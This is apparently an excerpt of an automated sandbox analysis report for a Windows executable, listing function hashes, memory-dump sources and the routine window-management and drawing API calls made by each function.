Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: Rect$Empty$Client
String ID:
API String ID: 1457177775-0
Opcode ID: 368fdcd1ac5f629ee5aa2207dcafbb2c7ad195073cebceab2cc1f8ea435a694b
Instruction ID: b00bf3f8a50b8f0946aba6f22553f9d5e2b9cfe8b3da14f7610f2ae270b14c86
Opcode Fuzzy Hash: 368fdcd1ac5f629ee5aa2207dcafbb2c7ad195073cebceab2cc1f8ea435a694b
Instruction Fuzzy Hash: 12D10931D00A4ACFCF19CFA9C9805AEB7F2BF55314F244569E819AB290DB75AD41CF90

Function 001FBCA5 Relevance: 7.7, APIs: 5, Instructions: 205COMMON

Download Yara Rule

APIs

IsWindow.USER32(?), ref: 001FBCF9
GetParent.USER32(?), ref: 001FBD18
GetParent.USER32(?), ref: 001FBD27

Part of subcall function 001DEEAA: SetParent.USER32(?,?), ref: 001DEEBD

GetWindowRect.USER32(?,?), ref: 001FBDBE
GetClientRect.USER32(?,?), ref: 001FBE37

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: Parent$RectWindow$Client
String ID:
API String ID: 3043635113-0
Opcode ID: a65e7d9a610e1072e720ae11269f0c1a8de0dcaf78cefa90054412d75e869b9a
Instruction ID: a7023c3f42f997e752845bae77646905783a63dfeae63286bcce7327240f701e
Opcode Fuzzy Hash: a65e7d9a610e1072e720ae11269f0c1a8de0dcaf78cefa90054412d75e869b9a
Instruction Fuzzy Hash: 90712970700604AFCB14AF65C8D8EAEBBFAAF89700F1505BDF506DB292CB719804CB51

Function 0020F5DC Relevance: 7.7, APIs: 5, Instructions: 182COMMON

Download Yara Rule

APIs

GetClientRect.USER32(?,?), ref: 0020F62A
InflateRect.USER32(?,00000000,00000000), ref: 0020F656
GetSystemMetrics.USER32(00000002), ref: 0020F6D3
_memset.LIBCMT ref: 0020F6F9

Part of subcall function 001DCDE7: SetWindowPos.USER32(?,000000FF,000000FF,?,?,00000000,001D8A00,?,001D8A00,00000000,?,?,000000FF,000000FF,00000015), ref: 001DCE0F

Part of subcall function 001D6F29: GetScrollInfo.USER32(?,?,?), ref: 001D6F5D

Part of subcall function 001D6EE9: SetScrollInfo.USER32(?,?,?,?), ref: 001D6F1A

EnableScrollBar.USER32(?,00000002,00000000), ref: 0020F7DC

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: Scroll$InfoRect$ClientEnableInflateMetricsSystemWindow_memset
String ID:
API String ID: 4263531605-0
Opcode ID: b88c5c1b5b49e5d06f80e31c9a1c7ff0d5bc02caca8b3ebcfa0f23f480350d24
Instruction ID: 5e73106e5132e14f19d302f8a13647676e396a258469249aa269d0ceb17c398b
Opcode Fuzzy Hash: b88c5c1b5b49e5d06f80e31c9a1c7ff0d5bc02caca8b3ebcfa0f23f480350d24
Instruction Fuzzy Hash: CE613A71A5121AEFDB10CFA8C984AEDB7B9FF48700F14047AE809AB296D7B15D11CF61

Function 00241B33 Relevance: 7.7, APIs: 5, Instructions: 168COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 00241BAD
EqualRect.USER32(?,?), ref: 00241BD8
BeginDeferWindowPos.USER32(?), ref: 00241BE5
EndDeferWindowPos.USER32(?), ref: 00241C0A

Part of subcall function 0023C83F: GetWindowRect.USER32(?,?), ref: 0023C855
Part of subcall function 0023C83F: GetParent.USER32(?), ref: 0023C897
Part of subcall function 0023C83F: GetParent.USER32(?), ref: 0023C8A7

Part of subcall function 001CACFF: __CxxThrowException@8.LIBCMT ref: 001CAD15
Part of subcall function 001CACFF: __EH_prolog3.LIBCMT ref: 001CAD22

GetWindowRect.USER32(?,?), ref: 00241CBF

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: Window$Rect$DeferParent$BeginEqualException@8H_prolog3Throw
String ID:
API String ID: 601628497-0
Opcode ID: e938d675725a65f5cf397ba0684ada18a20d7380861ec402862ba39f27c299a9
Instruction ID: 14548cc5dd5d96d00b1f4d7646c5818cf072e8805dd11a8fd2afeb33e567af92
Opcode Fuzzy Hash: e938d675725a65f5cf397ba0684ada18a20d7380861ec402862ba39f27c299a9
Instruction Fuzzy Hash: 5B513871A502099FCB14DFA9C9C49EEBBF9FF48310B24416AE505B7210DB70AEA0CF65

Function 002A150B Relevance: 7.7, APIs: 5, Instructions: 154COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 002A1512
CreateCompatibleDC.GDI32(00000000), ref: 002A1560
GetBoundsRect.GDI32(?,002A1A89,00000000,00000000), ref: 002A1588
CreateSolidBrush.GDI32 ref: 002A15A2
FillRect.USER32(00000000,002A1A89,?), ref: 002A15BB

Part of subcall function 002A08C5: FrameRgn.GDI32(00000000,?,00000000,002A1A89,0000003C), ref: 002A08ED

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: CreateRect$BoundsBrushCompatibleFillFrameH_prolog3_Solid
String ID:
API String ID: 2864772683-0
Opcode ID: 79483e3a39f2c46e1a0ff7c0c883bc657116428b4776a5da63c3da7eaa7ac48c
Instruction ID: c5802edc0af409daf74b938d4d7493db84bb6c1bf0b6eea8458fc12dbc299f44
Opcode Fuzzy Hash: 79483e3a39f2c46e1a0ff7c0c883bc657116428b4776a5da63c3da7eaa7ac48c
Instruction Fuzzy Hash: FD515F71C20219EFCF11DF94D885AEDBBB9FF19710F08002AF805AA251CB715AA5CFA4

Function 002132D4 Relevance: 7.7, APIs: 5, Instructions: 153windowCOMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 002132DB
RedrawWindow.USER32(?,?,?,00000541), ref: 002134A1

Part of subcall function 001DCBFE: GetWindowLongW.USER32(?,000000F0), ref: 001DCC09

GetSystemMenu.USER32(?,00000000), ref: 00213315
IsMenu.USER32(?), ref: 00213334
IsMenu.USER32(?), ref: 00213342

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: Menu$Window$H_prolog3LongRedrawSystem
String ID:
API String ID: 1445310841-0
Opcode ID: b9a616bac8761d63f36a084a5051216f8811115cd60bae3edcb1fa8d779e08b0
Instruction ID: 7cce0373c483d48d37868e63fe4e2f8cd6b1874d83df1e9fcc9397a1e4e74532
Opcode Fuzzy Hash: b9a616bac8761d63f36a084a5051216f8811115cd60bae3edcb1fa8d779e08b0
Instruction Fuzzy Hash: 0B51AF31A102068BDF00EFB4C942BEE77F6AF64300F144169E915EB291DF709E51CBA4

Function 001F3962 Relevance: 7.6, APIs: 5, Instructions: 133COMMON

Download Yara Rule

APIs

GetParent.USER32(?), ref: 001F39AF
GetWindowRect.USER32(?,?), ref: 001F39D1
GetClientRect.USER32(?,?), ref: 001F3A61
MapWindowPoints.USER32(?,?,?,00000002), ref: 001F3A74
FillRect.USER32(?,?), ref: 001F3AB4

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: Rect$Window$ClientFillParentPoints
String ID:
API String ID: 1064458942-0
Opcode ID: d76a65eb02df797beda5367d96a5f6395c80bc1a44e8bb4744802a6d8e77c9b5
Instruction ID: 02010a795cf93a9ebede5f1412f8d9023ec6376fbf349018d9425950b84edefa
Opcode Fuzzy Hash: d76a65eb02df797beda5367d96a5f6395c80bc1a44e8bb4744802a6d8e77c9b5
Instruction Fuzzy Hash: 49514971A00219EFCB15DFA9D8889BEBBB9FF48700B14446AF956E7211D7709E40CFA0

Function 00201276 Relevance: 7.6, APIs: 5, Instructions: 129windowCOMMON

Download Yara Rule

APIs

IsWindow.USER32(00000000), ref: 002012B5
ShowWindow.USER32(00000000,00000004), ref: 002012E7
IsWindow.USER32(?), ref: 0020132C
IsWindowVisible.USER32(?), ref: 00201337
ShowWindow.USER32(?,00000000), ref: 00201372

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: Window$Show$Visible
String ID:
API String ID: 2757229004-0
Opcode ID: 5b436a8a47fc6d4f9f187f54dd441d21e71bacb1ad8a0e1e1adacaed1e3837ef
Instruction ID: 70f03ff2e0f911c66c4255cc31fe1e0214833fd2e76c704ab08393d840213497
Opcode Fuzzy Hash: 5b436a8a47fc6d4f9f187f54dd441d21e71bacb1ad8a0e1e1adacaed1e3837ef
Instruction Fuzzy Hash: 8141C231620306AFDB14AFA1D885FAB77ADAF54750F144069FD49DB6C2DB70E860CBA0

Function 0020EDDF Relevance: 7.6, APIs: 5, Instructions: 123COMMON

Download Yara Rule

APIs

GetClientRect.USER32(?,?), ref: 0020EE10

Part of subcall function 001D015C: ClientToScreen.USER32(?,?), ref: 001D016D
Part of subcall function 001D015C: ClientToScreen.USER32(?,?), ref: 001D017A

PtInRect.USER32(?,?,?), ref: 0020EE2A
PtInRect.USER32(?,?,?), ref: 0020EE9D

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: ClientRect$Screen
String ID:
API String ID: 3187875807-0
Opcode ID: 9e1be42f94ec354f027b705b1c62a83d97ada7d13ff4c6b6b986bc0a225e7b6b
Instruction ID: ba7fae2798f9d5d18caf1c54db8b784a824ac4de97cb870fe8b4e28e1b16d5f2
Opcode Fuzzy Hash: 9e1be42f94ec354f027b705b1c62a83d97ada7d13ff4c6b6b986bc0a225e7b6b
Instruction Fuzzy Hash: 3D411F7191064BEFCF11DFA4D988AAEBBF5EF08310F114829E406FB281D771AA51DB51

Function 0024F663 Relevance: 7.6, APIs: 5, Instructions: 111keyboardCOMMON

Download Yara Rule

APIs

Part of subcall function 001DCBFE: GetWindowLongW.USER32(?,000000F0), ref: 001DCC09

GetWindowRect.USER32(?,0020CC3A), ref: 0024F697
GetSystemMetrics.USER32(00000021), ref: 0024F6A5
GetSystemMetrics.USER32(00000020), ref: 0024F6AB
GetKeyState.USER32(00000002), ref: 0024F6CB
InflateRect.USER32(0020CC3A,00000000,00000000), ref: 0024F701

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: MetricsRectSystemWindow$InflateLongState
String ID:
API String ID: 2406722796-0
Opcode ID: 9b3257bb9aaf8bd72865d5aa88e3d418551c1f6abc12837353791137cdc9d042
Instruction ID: 00a9858c7fc1a46e257ce6644b196cfc49a7db069afecd2fd7454a96b066b873
Opcode Fuzzy Hash: 9b3257bb9aaf8bd72865d5aa88e3d418551c1f6abc12837353791137cdc9d042
Instruction Fuzzy Hash: FD31E932A2010A9BDB58DF78DA89ABEF7F8EFC4390F15443AD406EB150DA789950CB50

Function 002A1997 Relevance: 7.6, APIs: 5, Instructions: 111COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 002A199E
RedrawWindow.USER32(?,00000000,00000000,00000105,0000005C,002A1C62,?,002A1D9B,?,?,?,00224C84,00000004,?,00000001,?), ref: 002A19C3
GetClientRect.USER32(?,?), ref: 002A19E1
CreateCompatibleDC.GDI32(002A1D9B), ref: 002A1A49
UpdateLayeredWindow.USER32(?,00000000,00000000,?,?,?,00000000), ref: 002A1AA9

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: Window$ClientCompatibleCreateH_prolog3_LayeredRectRedrawUpdate
String ID:
API String ID: 2227077885-0
Opcode ID: d4d60545fab65c0553ab04b8d2b998201e580bc7379ee712ca731eaffd1b0350
Instruction ID: ec53a0444b3152745039a8d3b5c0ed85f249a53667effe53d44de80686d3af3f
Opcode Fuzzy Hash: d4d60545fab65c0553ab04b8d2b998201e580bc7379ee712ca731eaffd1b0350
Instruction Fuzzy Hash: AC410271C01228AFCF02EFE4C985ADEBFB9AF19710F10415AE846B6252CB705A15CFA0

Function 001E92C2 Relevance: 7.6, APIs: 5, Instructions: 99COMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 001E92EB
ScreenToClient.USER32(?,?), ref: 001E931B
SetCursor.USER32 ref: 001E9364
ScreenToClient.USER32(?,?), ref: 001E9384
PtInRect.USER32(?,?,?), ref: 001E93AD

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: ClientCursorScreen$Rect
String ID:
API String ID: 1082406499-0
Opcode ID: d51332b12ea9b284467208ed23d37bdbfc636418e15bee3d007156dd503043aa
Instruction ID: 54ec05d7d7a9aafa82d5a9e20880f81945046bf253f60427386a1e458b4780ed
Opcode Fuzzy Hash: d51332b12ea9b284467208ed23d37bdbfc636418e15bee3d007156dd503043aa
Instruction Fuzzy Hash: E4315975A00649DFCB10EFB6D8C49AEBBF9FB08300F10452AE516A3291DB34A941CF60

Function 001EBE95 Relevance: 7.6, APIs: 5, Instructions: 99COMMON

Download Yara Rule

APIs

CallNextHookEx.USER32(00000000,?,?), ref: 001EBEB1
WindowFromPoint.USER32(?,?), ref: 001EBEDC
ScreenToClient.USER32(?,00000000), ref: 001EBF0D
GetParent.USER32(?), ref: 001EBF7B
UpdateWindow.USER32(?), ref: 001EBFD3

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: Window$CallClientFromHookNextParentPointScreenUpdate
String ID:
API String ID: 160110263-0
Opcode ID: 169510084bfc4c7d818c64f5b91cd5d5160c7ca581fe5c32f84e2d5282649644
Instruction ID: 02ec8b35abbad073db16fd3c709d9aa0bd735d5b04ccea2dc39b30726bc67742
Opcode Fuzzy Hash: 169510084bfc4c7d818c64f5b91cd5d5160c7ca581fe5c32f84e2d5282649644
Instruction Fuzzy Hash: 0F316B39608A40AFCB169FA5EC89FAE7BB9FB58360F15416DF5198B261DB31D800CF50

Function 001F0B14 Relevance: 7.6, APIs: 5, Instructions: 97COMMON

Download Yara Rule

APIs

InflateRect.USER32(?,000000FF,000000FF), ref: 001F0B4D
InflateRect.USER32(?,000000FF,000000FF), ref: 001F0B7C
InflateRect.USER32(?,?,?), ref: 001F0BDE
InflateRect.USER32(?,00000001,00000001), ref: 001F0BFA

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: InflateRect
String ID:
API String ID: 2073123975-0
Opcode ID: 4d65632df4401f98ad7f42b6bdb3f259e2242b83391da2d142966eb7953d6925
Instruction ID: e4f882e7f7683915f3cbefa4a8f32476176a6c4e1dde6d87e017e8849d2ee695
Opcode Fuzzy Hash: 4d65632df4401f98ad7f42b6bdb3f259e2242b83391da2d142966eb7953d6925
Instruction Fuzzy Hash: 08315072600249BBCF02DF95DC84DBB77ADFB48324F144616F625D72E2DA34EA118B60

Function 0020E0B7 Relevance: 7.6, APIs: 5, Instructions: 96COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 0020E10B

Part of subcall function 001DCC18: GetWindowLongW.USER32(?,000000EC), ref: 001DCC23

OffsetRect.USER32(?,?,00000000), ref: 0020E166
UnionRect.USER32(?,?,?), ref: 0020E184
EqualRect.USER32(?,?), ref: 0020E192
UpdateWindow.USER32(?), ref: 0020E1CE

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: Rect$Window$EqualLongOffsetUnionUpdate
String ID:
API String ID: 4261707372-0
Opcode ID: 219f0728e1b50006d7309f015ab054b50ff96971ef20625827afecea8db227ac
Instruction ID: 560d310667d5ac231883009bf9f4445b6fbabf454e067dccc28c1f7b5fa54191
Opcode Fuzzy Hash: 219f0728e1b50006d7309f015ab054b50ff96971ef20625827afecea8db227ac
Instruction Fuzzy Hash: 5E312AB1901309DFCB10DFA9D9849EEFBF9BB48310F114A2EE55AE2251CB30A940DF50

Function 0020BAC5 Relevance: 7.6, APIs: 5, Instructions: 95COMMON

Download Yara Rule

APIs

Part of subcall function 0020B291: GetParent.USER32(?), ref: 0020B29D
Part of subcall function 0020B291: GetParent.USER32(00000000), ref: 0020B2A0

GetWindowLongW.USER32(?,000000EC), ref: 0020BB34
RedrawWindow.USER32(?,00000000,00000000,00000081,?,?,?,?,?,0020BEE0,00000000), ref: 0020BB85
SetWindowLongW.USER32(?,000000EC,?), ref: 0020BB94
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000137,?,?,?,?,?,0020BEE0,00000000), ref: 0020BBAA
GetClientRect.USER32(?,?), ref: 0020BBBE

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: Window$LongParent$ClientRectRedraw
String ID:
API String ID: 556606033-0
